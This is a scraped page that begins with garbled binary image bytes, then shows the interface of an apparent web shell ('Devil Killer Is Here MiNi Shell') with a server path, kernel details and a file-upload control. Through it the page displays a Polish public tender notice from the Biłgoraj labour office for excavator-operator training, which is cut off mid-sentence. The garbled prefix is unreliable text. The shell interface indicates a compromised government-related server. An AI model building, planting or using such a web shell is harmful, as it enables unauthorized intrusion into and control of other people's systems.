JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221006/0038024301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa organizacji grupowego szkolenia dla osób bezrobotnych w zakresie: <br/>„Operator koparkoładowarki wszystkie klasa III” - w ramach POWER </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIATOWY URZĄD PRACY W BIŁGORAJU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950031692</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bohaterów Monte Cassino 38</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Biłgoraj</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">23-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">846850000</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@pupbilgoraj.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://pup.bilgoraj.ibip.pl/public/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa organizacji grupowego szkolenia dla osób bezrobotnych w zakresie: <br/>„Operator koparkoładowarki wszystkie klasa III” - w ramach POWER </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d8c08765-4497-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00380243</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00040268/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Organizacja szkoleń grupowych dla osób bezrobotnych - w ramach projektu pn. „Aktywizacja osób młodych pozostających bez pracy w powiecie biłgorajskim (VI)” w ramach POWER</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt pn.: „Aktywizacja osób młodych pozostających bez pracy w powiecie biłgorajskim (VI)” finansowanego ze środków Funduszu Pracy w ramach Programu Operacyjnego Wiedza Edukacja Rozwój współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej pod adresem: zamowienia@pupbilgoraj.pl , z zastrzeżeniem że oferta musi być złożona przy użyciu miniPortalu.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na<br/>ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza<br/>do komunikacji”. 2)Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w „Regulaminie korzystania z systemu<br/>miniPortal” dostępnego na stronie: https://miniportal.uzp.gov.pl/WarunkiUslugi oraz „Warunkach korzystania z elektronicznej<br/>platformy usług administracji publicznej (ePUAP)”. 3)Zasady składania ofert oraz dokumentów składanych wraz z ofertą oraz<br/>wymagania techniczne i organizacyjne ich wysyłania opisane zostały w „Instrukcji użytkownika”. Wykonawca zobowiązany jest<br/>zapoznać się z ww. Instrukcją i postępować wg zasad w niej wskazanych. Wykonawca ubiegając się o udzielenie zamówienia w<br/>szczególności składając ofertę akceptuje zasady korzystania z systemu miniPortal wskazane w „Instrukcji użytkownika” i SWZ.<br/>Wymagania techniczne dla urządzeń teleinformatycznych określa Regulamin korzystania z systemu miniPortal oraz SWZ.<br/>4)Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania<br/>oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB. 5)Za datę przekazania oferty, wniosków, zawiadomień,<br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się<br/>datę ich przekazania na ePUAP. 6)Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik Nr 12 do<br/>SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla<br/>Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>SKŁADANIE OFERT: 1)Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku”<br/>dostępnego na ePUAP i udostępnionego również na miniPortalu.<br/>Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego<br/>postępowania. 2)W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie<br/>korespondencja związana z postępowaniem. 3)Ofertę należy sporządzić w języku polskim. 4)Ofertę składa się, pod rygorem<br/>nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym w<br/>formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne (Dz. U. z 2021 r. poz. 2070 z późn. zm.), z zastrzeżeniem formatów, o<br/>których mowa w art. 66 ust. 1 ustawy Pzp, z uwzględnieniem rodzaju przekazywanych danych. 5)Sposób złożenia oferty, w tym<br/>zaszyfrowania oferty opisany został w „Instrukcji użytkownika”, dostępnej na stronie: https://miniportal.uzp.gov.pl/ 6)Do oferty należy<br/>dołączyć oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu, w zakresie wskazanym w pkt<br/>8.1 SWZ, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym oraz inne<br/>dokumenty i oświadczenia, o których mowa w rozdziale 13 SWZ, a następnie zaszyfrować wraz z plikami stanowiącymi ofertę.<br/>7)Oferta może być złożona tylko do upływu terminu składania ofert. 8)Wykonawca może przed upływem terminu do składania ofert<br/>wycofać ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i<br/>udostępnionego również na miniPortalu. Sposób wycofania oferty został opisany w „Instrukcji użytkownika” dostępnej na<br/>miniPortalu). 9)Wykonawca po upływie terminu do składania ofert nie może skutecznie dokonać zmiany ani wycofać złożonej oferty.<br/>Ciąg dalszy w Sekcji IX Pozostałe informacje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady<br/>(UE)2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.<br/>Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1) administratorem Pani/Pana danych osobowych jest: Powiatowy Urząd Pracy w Biłgoraju z siedzibą przy ul. Bohaterów Monte<br/>Cassino 38, 23 - 400 Biłgoraj, reprezentowany przez Dyrektora PUP. Numer tel.: 84 6850000, fax 84 6861671, adres email:<br/>pupbilgoraj@pupbilgoraj.pl.<br/>2) inspektorem ochrony danych w PUP w Biłgoraju jest Pan Janusz Małek. Dane kontaktowe: adres siedziby PUP, numer tel.: 84<br/>6850000, fax 84 6861671, email: iod@pupbilgoraj.pl<br/>3) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia postępowania o<br/>udzielenie zamówienia publicznego prowadzonego na podstawie art. 275 pkt 1 w związku z art 359 pkt 2 ustawy z dnia 11 września<br/>2019r. Prawo zamówień publicznych (Dz. U. z 2021r. poz. 1129 z późn. zm.), którego przedmiotem jest usługa społeczna pn.:<br/>„Usługa organizacji grupowego szkolenia dla osób bezrobotnych w zakresie: „Operator koparkoładowarki wszystkie klasa III&#34; - w ramach POWER&#34; oraz zawarcia umowy na realizację zamówienia;<br/>4) odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 8 oraz art. 96 ust. 3 ustawy Pzp;<br/>5) dane osobowe Wykonawcy będą przechowywane przez okres niezbędny do realizacji wskazanego w pkt 3 celu przetwarzania<br/>jednak nie krócej niż przez okres wynikający z przepisów ustawy Pzp oraz obowiązujących w PUP przepisów kancelaryjno –<br/>archiwalnych;<br/>6) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym<br/>w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp;<br/>7) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>8) Wykonawca posiada:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>b) na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie<br/>narusza integralności protokołu oraz jego załączników;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego<br/>danych osobowych narusza przepisy RODO;<br/>9) Wykonawcy nie przysługuje:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.<br/>10)Jednocześnie Zamawiający przypomina o ciążącym na Wykonawcy obowiązku informacyjnym wynikającym z art. 14 RODO<br/>względem osób fizycznych, których dane zostaną przekazane zamawiającemu w związku z prowadzonym postępowaniem i które<br/>zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno<br/>wyłączenie, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OA. 2710.15.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa organizacji grupowego szkolenia dla 10 osób bezrobotnych w zakresie: &#34;Operator koparkoładowarki wszystkie klasa III &#34;. Szczegółowy opis przedmiotu zamówienia stanowi Załącznik Nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80530000-8 - Usługi szkolenia zawodowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów<br/>oceny ofert:<br/>1) całkowity koszt szkolenia (cena) – 60 %,<br/>2) dostosowanie doświadczenia kadry dydaktycznej do zakresu szkolenia - 40%.<br/>Szczegółowy opis kryteriów, którymi zamawiający będzie się kierował przy wyborze oferty, wraz z podaniem wag tych kryteriów i<br/>sposobu oceny ofert został określony w rozdziale 17 SWZ.<br/>Zamawiający będzie obliczał punktację w poszczególnych kryteriach z dokładnością do dwóch miejsc po przecinku, zaokrąglając<br/>wynik zgodnie z zasadami matematycznymi określonymi w pkt 16.8 SWZ. Ostateczna liczba punktów danej oferty wynikać będzie z<br/>sumy punktów otrzymanych w poszczególnych kryteriach. Oferta, która uzyska łącznie najwięcej punktów stanowiących sumę<br/>punktów otrzymanych w poszczególnych kryteriach zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostosowanie doświadczenia kadry dydaktycznej do zakresu szkolenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zgodnie z pkt 6.1 SWZ:<br/>&#34;6.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu:<br/>6.1.1. zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w w/w zakresie.<br/>6.1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów;<br/>Warunkiem udziału w postępowaniu jest posiadanie przez wykonawcę aktualnego wpisu do rejestru instytucji szkoleniowych<br/>prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej na podstawie art. 20<br/>ust. 1 ustawy z dnia 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2022r. poz. 690 z późn.<br/>zm.). Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, o którym mowa w pkt 8.1 SWZ.<br/>Oświadczenie należy złożyć wg wzoru określonego w załączniku nr 3 do SWZ. Zamawiający zweryfikuje w Rejestrze<br/>Instytucji Szkoleniowych dostępnym na stronie www.ris.praca.gov.pl czy Wykonawca ubiegający się o realizację zamówienia<br/>jest wpisany do rejestru instytucji szkoleniowych i posiada aktualny wpis.<br/>6.1.3. sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa warunku w w/w zakresie.<br/>6.1.4. zdolności technicznej lub zawodowej:<br/>Warunek ten zostanie spełniony jeżeli wykonawca wykaże, iż:<br/>1) posiada wiedzę i doświadczenie w świadczeniu usług szkoleniowych tj.:<br/>w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie, wykonał należycie co najmniej 3 szkolenia grupowe dla co najmniej 5 osób każde;<br/>2) dysponuje lub będzie dysponować osobą lub osobami, które będą uczestniczyć w wykonaniu zamówienia, które w ciągu<br/>ostatnich 5 lat przed upływem terminu składania ofert przeprowadziły co najmniej 2 szkolenia lub bloki tematyczne w<br/>zakresie związanym z wykonywanymi czynnościami w zamówieniu.&#34;<br/>Zgodnie z pkt 6.3. i 6.4. SWZ:<br/>&#34;6.3. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i<br/>zrealizuje usługi, do których realizacji te uprawnienia są wymagane (art. 117 ust. 2 ustawy Pzp).<br/>6.4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia wykazując warunek udziału w postępowaniu mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane (art. 117 ust. 3<br/>ustawy Pzp).&#34; Zgodnie z art. 118 ustawy Pzp wykonawca może w celu potwierdzenia spełniania warunków udziału w<br/>postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na<br/>zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby,<br/>niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. (Patrz rozdział 9 SWZ). Sposób wykazania<br/>warunków udziału w postępowaniu wskazano w rozdziale 8 SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie<br/>wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie (nie krótszym niż 5 dni od dnia<br/>wezwania) następujących podmiotowych środków dowodowych i oświadczeń (aktualnych na dzień złożenia): 1)Zgodnie z pkt 8.4.2.<br/>SWZ: &#34;W celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu o udzielenie zamówienia, wykonawca<br/>zobowiązany jest do złożenia oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego w<br/>SWZ (patrz pkt 8.1 SWZ). Wzór oświadczenia stanowi załącznik nr 8 do SWZ. Przepis stosuje się odpowiednio do podmiotów<br/>udostępniających zasoby, w przypadku gdy wykonawca polega na zdolnościach tych podmiotów na<br/>zasadach określonych w art. 118 ustawy Pzp.&#34; 2)Zgodnie z pkt 9.9. SWZ: &#34;Wykonawca, który polega na zdolnościach lub sytuacji<br/>innych podmiotów na zasadach określonych w art. 118 ustawy Pzp, przedstawia na wezwanie zamawiającego wraz z<br/>oświadczeniem wymienionym w pkt. 8.4.2 SWZ, oświadczenie podmiotu udostępniającego zasoby o aktualności informacji<br/>zawartych w 